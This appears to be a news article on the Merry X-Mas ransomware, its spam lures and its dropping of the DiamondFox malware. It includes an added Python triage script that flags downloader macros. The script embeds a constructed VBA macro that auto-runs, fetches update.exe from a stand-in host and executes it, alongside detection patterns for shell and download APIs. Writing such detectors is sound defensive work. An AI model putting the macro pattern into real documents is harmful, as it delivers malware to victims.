The “Merry Christmas” ransomware, also known as Merry X-Mas, is also dropping the DiamondFox malware on infected computers.
The ransomware’s operators use this second payload to collect data from infected hosts, such as passwords and sensitive files.
Multiple security researchers detected the Merry Christmas ransomware in the first week of 2017.
Bleeping Computer ran an article on January 4, 2017, detailing the modus operandi of the first ransomware variants.
The initial wave of attacks used spam emails posing as FTC consumer complaints, carrying malicious document attachments.
Multiple waves of attacks have been pushed since, and new infections are still being detected.
One might think the ransomware was intended only for the Christmas season, and security experts expected it to fade soon.
They were wrong. A few days after the initial wave of Merry Christmas ransomware infections, researchers detected a second wave of attacks.
Cleverly, the operators used different ransom notes and spam lures this time, with emails posing as court attendance notices.
Nothing changed except the way victims are tricked into opening the attachment. These emails contained links that downloaded a document from a remote server; the document carried macro scripts which, if allowed to execute, download and install the latest version of the Merry Christmas ransomware.
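The infection chain described above (a macro that runs automatically when the document is opened, fetches a binary from a remote server and launches it) is the pattern a triage tool should look for in macro-laden attachments. The following Python script is an added example, not code from the article or from any of the researchers it cites. It scores VBA source for that pattern after undoing two cheap string-obfuscation tricks that defeat naive signature matching. Both macro samples and the URL example.invalid/update.exe are constructed for the demonstration; pulling the VBA out of a real .doc file would need a parser such as olevba from oletools, which this script does not use.

```python
"""Heuristic triage of VBA macro source for downloader behaviour.

Added example, not code from the article or any vendor. The macro text
below is constructed so the script runs offline; extracting VBA from a
real Office document is left to a tool such as oletools' olevba.
"""
import re

# Procedures Office invokes without user interaction once macros are enabled.
AUTO_EXEC = re.compile(
    r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open|AutoExec|AutoClose|Document_Close)\b",
    re.IGNORECASE,
)
# Objects/APIs commonly used to pull a payload from a remote server.
DOWNLOAD = re.compile(
    r"(URLDownloadToFile|MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream)",
    re.IGNORECASE,
)
# Ways a macro launches what it downloaded.
EXECUTE = re.compile(
    r"(WScript\.Shell|Shell\.Application|ShellExecute|\bShell\b|powershell|cmd\.exe)",
    re.IGNORECASE,
)
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def deobfuscate(src):
    """Undo two tricks that hide strings from scanners: Chr(n) character
    building and "a" & "b" concatenation. Lossy on purpose: the result is
    only used for indicator matching, never executed or re-parsed as VBA."""
    # Chr(65) -> "A", quoted so it can take part in the join below.
    src = re.sub(r"Chr\s*\(\s*(\d+)\s*\)",
                 lambda m: '"' + chr(int(m.group(1))) + '"', src,
                 flags=re.IGNORECASE)
    # "h" & "ttp" -> "http", including across VBA line continuations (& _ newline).
    return re.sub(r'"\s*&\s*(_\s*)?"', "", src)


def analyse_vba(src):
    """Return the indicators found in one macro module plus a verdict."""
    cleaned = deobfuscate(src)
    report = {
        "auto_exec": sorted({m.group(1) for m in AUTO_EXEC.finditer(cleaned)}),
        "download": sorted({m.group(1) for m in DOWNLOAD.finditer(cleaned)}),
        "execute": sorted({m.group(1) for m in EXECUTE.finditer(cleaned)}),
        "urls": sorted(set(URL.findall(cleaned))),
    }
    # All three legs (auto-run, fetch, launch) are needed to call it a
    # downloader; two legs is worth an analyst's look rather than a block.
    legs = sum(1 for key in ("auto_exec", "download", "execute") if report[key])
    report["verdict"] = {3: "downloader", 2: "suspicious"}.get(legs, "clean")
    return report


# Constructed samples: neither is taken from a real Merry X-Mas document.
BENIGN_MACRO = """
Sub FormatReport()
    Range("A1").Font.Bold = True
End Sub
"""

DOWNLOADER_MACRO = """
Sub AutoOpen()
    Dim u As String
    u = "h" & "ttp://" & "example.invalid/" & _
        "update.exe"
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", u, False
    h.Send
    Set s = CreateObject(Chr(65) & "DODB.Stream")
    s.Open: s.Type = 1: s.Write h.responseBody
    s.SaveToFile Environ("TEMP") & "\\update.exe", 2
    Set w = CreateObject("WScript.Shell")
    w.Run Environ("TEMP") & "\\update.exe"
End Sub
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_MACRO), ("downloader", DOWNLOADER_MACRO)):
        print(name, analyse_vba(src))
```

Without the deobfuscation step the second sample would only match on the `WScript.Shell` and `MSXML2.XMLHTTP` strings; the `ADODB.Stream` object and the full download URL are only visible once the `Chr()` and `&` concatenation are folded, which is why the scoring is done on the cleaned text.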
A few hours after Bleeping Computer published its findings, security researcher MalwareHunterTeam discovered that recent Merry Christmas ransomware versions also unpack and drop the DiamondFox malware.
DiamondFox is a modular malware family that’s currently sold on various Dark Web malware marketplaces, such as AlphaBay and Hansa.
This malware includes components for turning infected PCs into DDoS bots, stealing credit card data from PoS systems, ransacking browser passwords, opening RDP (remote desktop) connections, and many more.
The Merry Christmas family is not the first ransomware threat to add a secondary malware payload to its normal attack routine. In the summer of 2016, security researchers from Kaspersky discovered versions of the Shade (Troldesh) ransomware that downloaded the TeamSpy RAT in order to evaluate the type of computer they had infected and decide whether to charge a higher sum to unlock the files.
Below are screenshots of infected screens: